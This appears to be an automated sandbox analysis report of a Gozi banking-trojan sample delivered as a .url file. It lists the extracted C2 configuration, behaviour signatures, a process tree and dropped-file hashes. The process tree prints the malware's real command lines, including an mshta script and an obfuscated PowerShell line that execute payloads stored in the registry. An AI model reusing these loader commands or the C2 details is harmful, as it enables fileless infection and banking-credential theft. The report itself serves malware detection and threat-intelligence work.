Analysis

  • max time kernel
    161s
  • max time network
    164s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-10-2023 01:40

General

  • Target

    url/Amministrazione.url

  • Size

    195B

  • MD5

    ba89826b4115e395e16cb5a1f88b8509

  • SHA1

    9638d1cb1dde598f6b6e6d165f193c972ba3c229

  • SHA256

    e27258c5b05fba296137f8639082a4879f8795b3d3906788e36b59d74eb18062

  • SHA512

    bd348e28231532bea645759b0d0d0ee6a41f83ad4104b3284728bdbfd296080e9540d2a18160f88cd2db0b33797ba7813607860aa92f4bce93c7434ba92f138f

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

C2

fotexion.com

Attributes
  • base_path

    /jerry/

  • build

    250260

  • exe_type

    loader

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Extracted

Family

gozi

Botnet

5050

C2

fotexion.com

Attributes
  • base_path

    /pictures/

  • build

    250260

  • exe_type

    worker

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Signatures

  • Gozi

    Gozi is a well-known and widely distributed banking trojan.

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 1 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 57 IoCs

Processes

  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
      PID:3692
    • C:\Windows\System32\rundll32.exe
      "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\url\Amministrazione.url
      1⤵
      • Checks computer location settings
      • Modifies registry class
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:4900
      • C:\Windows\System32\control.exe
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\MBSMWSRL\dettagli[1].cpl",
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4992
        • C:\Windows\system32\rundll32.exe
          "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\MBSMWSRL\dettagli[1].cpl",
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3760
          • C:\Windows\SysWOW64\rundll32.exe
            "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\MBSMWSRL\dettagli[1].cpl",
            4⤵
            • Blocklisted process makes network request
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of WriteProcessMemory
            PID:680
            • C:\Windows\system32\control.exe
              C:\Windows\system32\control.exe -h
              5⤵
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of WriteProcessMemory
              PID:3688
              • C:\Windows\system32\rundll32.exe
                "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
                6⤵
                  PID:4304
      • C:\Windows\System32\RuntimeBroker.exe
        C:\Windows\System32\RuntimeBroker.exe -Embedding
        1⤵
          PID:4644
        • C:\Windows\System32\RuntimeBroker.exe
          C:\Windows\System32\RuntimeBroker.exe -Embedding
          1⤵
            PID:3936
          • C:\Windows\Explorer.EXE
            C:\Windows\Explorer.EXE
            1⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: GetForegroundWindowSpam
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of UnmapMainImage
            • Suspicious use of WriteProcessMemory
            PID:3104
            • C:\Windows\System32\mshta.exe
              "C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xmx1='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xmx1).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\2D69E7DB-A838-E7C3-1AB1-5C0BEE75506F\\\MemoryMusic'));if(!window.flag)close()</script>"
              2⤵
              • Checks computer location settings
              • Suspicious use of WriteProcessMemory
              PID:4624
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqvoegb -value gp; new-alias -name osrkamamiu -value iex; osrkamamiu ([System.Text.Encoding]::ASCII.GetString((uqvoegb "HKCU:Software\AppDataLow\Software\Microsoft\2D69E7DB-A838-E7C3-1AB1-5C0BEE75506F").LinkAbout))
                3⤵
                • Suspicious use of SetThreadContext
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:1132
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\slnsjukb\slnsjukb.cmdline"
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3320
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA311.tmp" "c:\Users\Admin\AppData\Local\Temp\slnsjukb\CSC44E8AB7DB6A2421292B446D6A6159FB.TMP"
                    5⤵
                      PID:1980
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\s4kxfuki\s4kxfuki.cmdline"
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3332
                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB36D.tmp" "c:\Users\Admin\AppData\Local\Temp\s4kxfuki\CSC57C5316196E8479ABEEF5CF7EEDB49F7.TMP"
                      5⤵
                        PID:3600
                • C:\Windows\syswow64\cmd.exe
                  "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
                  2⤵
                    PID:952
                • C:\Windows\System32\RuntimeBroker.exe
                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                  1⤵
                    PID:3664

                  Network

                  MITRE ATT&CK Enterprise v15

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\MBSMWSRL\dettagli[1].cpl

                    Filesize

                    206KB

                    MD5

                    72e2a5c797954e895a41be5b20f867b2

                    SHA1

                    419aacfb3ccea9b08277bcc9405054fa4238a597

                    SHA256

                    858d867cc62c0bf13b16ccdb9f6cd6022d61fc2ab98a7db60806a35c7da9b2e0

                    SHA512

                    77be53cf579f69ee728fafbe93568b8d4c462490ba3fe053db367798508abb0d7a838731d17e465f0a29b982eb49e1227d94c971823e1d375b2b761887e107b3

                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\MBSMWSRL\dettagli[1].cpl

                    Filesize

                    206KB

                    MD5

                    72e2a5c797954e895a41be5b20f867b2

                    SHA1

                    419aacfb3ccea9b08277bcc9405054fa4238a597

                    SHA256

                    858d867cc62c0bf13b16ccdb9f6cd6022d61fc2ab98a7db60806a35c7da9b2e0

                    SHA512

                    77be53cf579f69ee728fafbe93568b8d4c462490ba3fe053db367798508abb0d7a838731d17e465f0a29b982eb49e1227d94c971823e1d375b2b761887e107b3

                  • C:\Users\Admin\AppData\Local\Temp\RESA311.tmp

                    Filesize

                    1KB

                    MD5

                    ae25e9ebe582ef7547a276f231b68d19

                    SHA1

                    acec9a69b9212bfb28aec41ea8828697f52661de

                    SHA256

                    6245a3b5486113621f762297c4f8bdc24aed55fe653623064a29eb4e5fc835bf

                    SHA512

                    aa5c46e3a339caa6e035c2479c0780e834b437049a6f4b28f05ae40a5f1bedd8ee417a91952909514591e2760080f5ddae6b5687d1e07ad13de14d15feb1b128

                  • C:\Users\Admin\AppData\Local\Temp\RESB36D.tmp

                    Filesize

                    1KB

                    MD5

                    1fda70e35b817da12f17aadc71abd669

                    SHA1

                    35ca0546af156eef2db968c3601c7d71cde007b0

                    SHA256

                    547d7e5e25102838174d13c014eb981f6a78d90486954535607a91ab6cf785e9

                    SHA512

                    5ff2214612b44c4699c8dca8f1cf06cf3270585d69fd3517cd6aa7a98fd1a495ff6f1ce51992acfc4092a3964277f40334a6c447db9e0bc5515b1ebb983a3508

                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_atifz54h.yqi.ps1

                    Filesize

                    60B

                    MD5

                    d17fe0a3f47be24a6453e9ef58c94641

                    SHA1

                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                    SHA256

                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                    SHA512

                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                  • C:\Users\Admin\AppData\Local\Temp\s4kxfuki\s4kxfuki.dll

                    Filesize

                    3KB

                    MD5

                    437728ec5bceed371c7398a56e4b33ca

                    SHA1

                    290b237ab8019d089bd41e7a9d363c62f5a46a2c

                    SHA256

                    2f35660cb33f3346a65ec9d06594a64067a902cb9e5c5b40f92c3007ad3c25e8

                    SHA512

                    adf69a1c1d777191dc62e762c0ff4a170733836baa6b9f6d66295162b9218dbabae73e227b588c882df0af3976b39ca3ce964f568511ba6b7de2c234200a296e

                  • C:\Users\Admin\AppData\Local\Temp\slnsjukb\slnsjukb.dll

                    Filesize

                    3KB

                    MD5

                    1144cb0783453cb3e037565c4d84b82d

                    SHA1

                    18415f66f2b6f24193077895d3c29aa7cf98cd83

                    SHA256

                    b25bbedcfc464018b03d3e0aa08a000fcf90cd7f6158d76644c2548b30041fe5

                    SHA512

                    1db797aeab12f6b5cc601996e427fe24d25f4ae533a32150686a21838ba7e6fd8116dfa0dedd52d068cdde03e4ab216cd3c56ba85def19d720b21fd93e7e2946

                  • \??\c:\Users\Admin\AppData\Local\Temp\s4kxfuki\CSC57C5316196E8479ABEEF5CF7EEDB49F7.TMP

                    Filesize

                    652B

                    MD5

                    b5ee00a849cb23e4fba43d3d177e0f71

                    SHA1

                    fc9a89b8e21a73628d2b02a5fb3f5eef12f4e074

                    SHA256

                    bdc858c3ffd5b7a4b9eaa44f2af16d8de94cc08d1c560d59c64d3acc9709bef4

                    SHA512

                    14a8e7398dfe57563f2024573db519f1939a342d6979cea7f0902eb31544d00dec8e3a8842011a61fd6ae0fa7c316189465c78e5c9c7fb2bf77bffd89cecb18d

                  • \??\c:\Users\Admin\AppData\Local\Temp\s4kxfuki\s4kxfuki.0.cs

                    Filesize

                    406B

                    MD5

                    ca8887eacd573690830f71efaf282712

                    SHA1

                    0acd4f49fc8cf6372950792402ec3aeb68569ef8

                    SHA256

                    568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

                    SHA512

                    2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

                  • \??\c:\Users\Admin\AppData\Local\Temp\s4kxfuki\s4kxfuki.cmdline

                    Filesize

                    369B

                    MD5

                    eaebb457ade7c556f2991ff70155e7ce

                    SHA1

                    ad2ad4b79b56f5b394f451316e1d21be37c70cbc

                    SHA256

                    5626a79adf8db2342b1d0dccc598ef847e52d528a82ee63c3f2406ccc054c1a0

                    SHA512

                    0eccc20557144e5bc9ea972f09849c44c3cdd92a4b4af44b592e75f24728c278675b425e2f6a9ef486806d6e0fcd28dae1e01f6afeac72acd1758122b8dba34f

                  • \??\c:\Users\Admin\AppData\Local\Temp\slnsjukb\CSC44E8AB7DB6A2421292B446D6A6159FB.TMP

                    Filesize

                    652B

                    MD5

                    cbc5a6bde86980c32052679de840c079

                    SHA1

                    244bd6fcfce9f48933647e9df0f1dce3e8f58e45

                    SHA256

                    7f39b8728d1632a84c72620884ccac30187824047b2cb67debc10f83bf3c868e

                    SHA512

                    6eb01b47fca13670c9878a7173d3426d5d4adafc4fcd11b53bf4c957eb7ce3362934c585b26b30fb9e20b6382704c06f3e7025768bb097dbe971be5e4e6f2629

                  • \??\c:\Users\Admin\AppData\Local\Temp\slnsjukb\slnsjukb.0.cs

                    Filesize

                    405B

                    MD5

                    caed0b2e2cebaecd1db50994e0c15272

                    SHA1

                    5dfac9382598e0ad2e700de4f833de155c9c65fa

                    SHA256

                    21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

                    SHA512

                    86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

                  • \??\c:\Users\Admin\AppData\Local\Temp\slnsjukb\slnsjukb.cmdline

                    Filesize

                    369B

                    MD5

                    cc1fae4b54e6897445d20c5ca6e35626

                    SHA1

                    f0f193ead83ed3743fb31891b257fbfefc9a3806

                    SHA256

                    6159739cfc4e2f5c9635c5a5bf3692781bb0ae643c217b74cb3698515d67c9b4

                    SHA512

                    6f36b397255a44b4f01c807e719971935a651b1a0083388c3f10750d21e2e910634955f5096d0749610988822b14c8ad81b2c78245aab6b96720bf01358b6df1

                  • memory/680-112-0x0000000002CE0000-0x0000000002CEE000-memory.dmp

                    Filesize

                    56KB

                  • memory/680-12-0x0000000002CE0000-0x0000000002CEE000-memory.dmp

                    Filesize

                    56KB

                  • memory/680-11-0x0000000003040000-0x0000000003069000-memory.dmp

                    Filesize

                    164KB

                  • memory/680-8-0x00000000030C0000-0x00000000030CD000-memory.dmp

                    Filesize

                    52KB

                  • memory/680-7-0x0000000002CE0000-0x0000000002CEE000-memory.dmp

                    Filesize

                    56KB

                  • memory/680-6-0x0000000003040000-0x0000000003069000-memory.dmp

                    Filesize

                    164KB

                  • memory/952-121-0x0000000000FE0000-0x0000000001078000-memory.dmp

                    Filesize

                    608KB

                  • memory/952-113-0x0000000000B40000-0x0000000000B41000-memory.dmp

                    Filesize

                    4KB

                  • memory/952-109-0x0000000000FE0000-0x0000000001078000-memory.dmp

                    Filesize

                    608KB

                  • memory/1132-25-0x00000250DC050000-0x00000250DC060000-memory.dmp

                    Filesize

                    64KB

                  • memory/1132-66-0x00000250F4AE0000-0x00000250F4B1D000-memory.dmp

                    Filesize

                    244KB

                  • memory/1132-52-0x00000250DC050000-0x00000250DC060000-memory.dmp

                    Filesize

                    64KB

                  • memory/1132-53-0x00000250DC050000-0x00000250DC060000-memory.dmp

                    Filesize

                    64KB

                  • memory/1132-50-0x00007FF97EB40000-0x00007FF97F601000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/1132-58-0x00000250F4AD0000-0x00000250F4AD8000-memory.dmp

                    Filesize

                    32KB

                  • memory/1132-40-0x00000250F4720000-0x00000250F4728000-memory.dmp

                    Filesize

                    32KB

                  • memory/1132-103-0x00000250F4AE0000-0x00000250F4B1D000-memory.dmp

                    Filesize

                    244KB

                  • memory/1132-125-0x00000250F4AE0000-0x00000250F4B1D000-memory.dmp

                    Filesize

                    244KB

                  • memory/1132-51-0x00000250DC050000-0x00000250DC060000-memory.dmp

                    Filesize

                    64KB

                  • memory/1132-19-0x00000250F4730000-0x00000250F4752000-memory.dmp

                    Filesize

                    136KB

                  • memory/1132-24-0x00007FF97EB40000-0x00007FF97F601000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/1132-124-0x00007FF97EB40000-0x00007FF97F601000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/1132-27-0x00000250DC050000-0x00000250DC060000-memory.dmp

                    Filesize

                    64KB

                  • memory/1132-26-0x00000250DC050000-0x00000250DC060000-memory.dmp

                    Filesize

                    64KB

                  • memory/3104-110-0x0000000008AE0000-0x0000000008B84000-memory.dmp

                    Filesize

                    656KB

                  • memory/3104-116-0x0000000009680000-0x0000000009724000-memory.dmp

                    Filesize

                    656KB

                  • memory/3104-69-0x0000000001110000-0x0000000001111000-memory.dmp

                    Filesize

                    4KB

                  • memory/3104-68-0x0000000008AE0000-0x0000000008B84000-memory.dmp

                    Filesize

                    656KB

                  • memory/3104-129-0x0000000009680000-0x0000000009724000-memory.dmp

                    Filesize

                    656KB

                  • memory/3664-105-0x00000261A61E0000-0x00000261A61E1000-memory.dmp

                    Filesize

                    4KB

                  • memory/3664-101-0x00000261A6640000-0x00000261A66E4000-memory.dmp

                    Filesize

                    656KB

                  • memory/3664-128-0x00000261A6640000-0x00000261A66E4000-memory.dmp

                    Filesize

                    656KB

                  • memory/3688-61-0x0000000000A10000-0x0000000000AB4000-memory.dmp

                    Filesize

                    656KB

                  • memory/3688-91-0x0000000000A10000-0x0000000000AB4000-memory.dmp

                    Filesize

                    656KB

                  • memory/3688-62-0x0000000000AC0000-0x0000000000AC1000-memory.dmp

                    Filesize

                    4KB

                  • memory/3692-117-0x0000023D71720000-0x0000023D717C4000-memory.dmp

                    Filesize

                    656KB

                  • memory/3692-77-0x0000023D71720000-0x0000023D717C4000-memory.dmp

                    Filesize

                    656KB

                  • memory/3692-79-0x0000023D71180000-0x0000023D71181000-memory.dmp

                    Filesize

                    4KB

                  • memory/3936-88-0x000001B9B34B0000-0x000001B9B34B1000-memory.dmp

                    Filesize

                    4KB

                  • memory/3936-126-0x000001B9B34F0000-0x000001B9B3594000-memory.dmp

                    Filesize

                    656KB

                  • memory/3936-87-0x000001B9B34F0000-0x000001B9B3594000-memory.dmp

                    Filesize

                    656KB

                  • memory/4304-82-0x0000021D87700000-0x0000021D87701000-memory.dmp

                    Filesize

                    4KB

                  • memory/4304-78-0x0000021D87850000-0x0000021D878F4000-memory.dmp

                    Filesize

                    656KB

                  • memory/4304-100-0x0000021D87850000-0x0000021D878F4000-memory.dmp

                    Filesize

                    656KB

                  • memory/4644-94-0x000002B087BA0000-0x000002B087C44000-memory.dmp

                    Filesize

                    656KB

                  • memory/4644-127-0x000002B087BA0000-0x000002B087C44000-memory.dmp

                    Filesize

                    656KB

                  • memory/4644-95-0x000002B0859A0000-0x000002B0859A1000-memory.dmp

                    Filesize

                    4KB